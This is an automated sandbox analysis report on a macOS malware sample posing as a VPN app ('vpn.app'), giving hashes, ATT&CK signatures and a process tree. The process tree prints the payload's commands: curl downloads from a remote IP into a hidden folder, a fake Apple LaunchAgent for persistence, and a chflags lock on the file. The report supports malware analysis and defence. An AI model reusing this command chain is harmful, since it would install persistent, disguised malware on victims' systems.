Overview

overview

10

Static

static

10

Covid/covid

windows11-21h2-x64

1

Covid/covid

macos-10.15-amd64

1

Covid/softwareupdated

windows11-21h2-x64

1

Covid/softwareupdated

macos-10.15-amd64

1

Covid/vpn.dmg

windows11-21h2-x64

3

Covid/vpn.dmg

macos-10.15-amd64

7

vpn.app/Co...OS/vpn

windows11-21h2-x64

1

vpn.app/Co...OS/vpn

macos-10.15-amd64

7

vpn.app/Co...script

windows11-21h2-x64

1

vpn.app/Co...script

macos-10.15-amd64

7

Resubmissions

07-11-2024 18:36

241107-w9c14sxcjh 10

Analysis

  • max time kernel
    114s
  • max time network
    145s
  • platform
    macos-10.15_amd64
  • resource
    macos-20241106-en
  • resource tags

    arch:amd64arch:i386image:macos-20241106-enkernel:19b77alocale:en-usos:macos-10.15-amd64system
  • submitted
    07-11-2024 18:36

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    vpn.app/Contents/Resources/script

  • Size

    1KB

  • MD5

    dc57d6b9a90daa5ea1c796ed2e32c0db

  • SHA1

    fa2556765290b0a91df3b34e3b09b31670762628

  • SHA256

    4cc4d170209897ce52093a13e2b5a27405efaeb9be1f8e1aaf93226e3451d110

  • SHA512

    f0828f0f17f27044e12b2bfb0d8400e004535bbf3358e9724f03803d2826e3cb9aa83d532c3979590e4efb88053c6661a1690853f3a75299ea92b0829e73538c

Score
7/10
evasionexecutionexfiltrationpersistence

Malware Config

Signatures

  • Exfiltration Over Alternative Protocol 1 TTPs 2 IoCs

    Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.

    exfiltration
  • Launch Agent 1 TTPs

    Adversaries may create or modify launch agents to repeatedly execute malicious payloads as part of persistence.

    persistence
  • Resource Forking 1 TTPs 4 IoCs

    Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.

    evasion
  • Launchctl 1 TTPs 2 IoCs

    Adversaries may abuse launchctl to execute commands or programs. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.

    execution

Processes

  • /bin/sh
    sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/Resources/script\""
    1⤵
      PID:450
    • /bin/bash
      sh -c "sudo /bin/zsh -c \"/Users/run/vpn.app/Contents/Resources/script\""
      1⤵
        PID:450
      • /usr/bin/sudo
        sudo /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script
        1⤵
          PID:450
          • /bin/zsh
            /bin/zsh -c /Users/run/vpn.app/Contents/Resources/script
            2⤵
              PID:454
            • /Users/run/vpn.app/Contents/Resources/script
              /Users/run/vpn.app/Contents/Resources/script
              2⤵
                PID:454
                • /usr/bin/uname
                  uname -m
                  3⤵
                    PID:455
                  • /bin/mkdir
                    mkdir /Users/run/.androids
                    3⤵
                      PID:456
                    • /usr/bin/curl
                      curl -L http://46.137.201.254/softwareupdated2 -o /Users/run/.androids/softwareupdated
                      3⤵
                        PID:457
                      • /bin/chmod
                        chmod a+x /Users/run/.androids/softwareupdated
                        3⤵
                          PID:498
                        • /bin/chmod
                          chmod 644 /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
                          3⤵
                            PID:499
                          • /bin/launchctl
                            launchctl load /Users/run/Library/LaunchAgents/com.apple.softwareupdate.plist
                            3⤵
                              PID:500
                            • /bin/launchctl
                              launchctl start softwareupdated
                              3⤵
                                PID:502
                              • /Users/run/.androids/softwareupdated
                                /Users/run/.androids/softwareupdated
                                3⤵
                                  PID:503
                                • /usr/bin/chflags
                                  chflags uchg /Users/run/.androids/softwareupdated
                                  3⤵
                                    PID:504
                                  • /usr/bin/curl
                                    curl -L http://46.137.201.254/covid -o /Users/run/covid
                                    3⤵
                                      PID:505
                                • /usr/libexec/xpcproxy
                                  xpcproxy com.apple.nsurlstoraged
                                  1⤵
                                    PID:487
                                  • /usr/libexec/nsurlstoraged
                                    /usr/libexec/nsurlstoraged --privileged
                                    1⤵
                                      PID:487
                                    • /usr/libexec/xpcproxy
                                      xpcproxy softwareupdated
                                      1⤵
                                        PID:501
                                      • /Users/run/.androids/softwareupdated
                                        /Users/run/.androids/softwareupdated -D
                                        1⤵
                                          PID:501
                                        • /usr/libexec/xpcproxy
                                          xpcproxy com.apple.corespotlightservice.725FD30A-6064-6C02-CC51-5DDB8891B57E
                                          1⤵
                                            PID:506
                                          • /System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
                                            /System/Library/Frameworks/CoreSpotlight.framework/CoreSpotlightService
                                            1⤵
                                              PID:506

                                            Network

                                            MITRE ATT&CK Enterprise v15

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            • /var/db/nsurlstoraged/dafsaData.bin
                                              Filesize

                                              54KB

                                              MD5

                                              64f469698e53d0c828b7f90acd306082

                                              SHA1

                                              bcc041b3849e1b0b4104ffeb46002207eeac54f3

                                              SHA256

                                              d74d0e429343f5e1b3e0b9437e048917c4343a30cff068739ea898bad8e37ffd

                                              SHA512

                                              a8334d1304f2fbd32cfd0ca35c289a45c450746cf3be57170cbbe87b723b1910c2e950a73c1fb82de9dc5ed623166d339a05fec3d78b861a9254dc2cb51fab5f

                                              Download Submit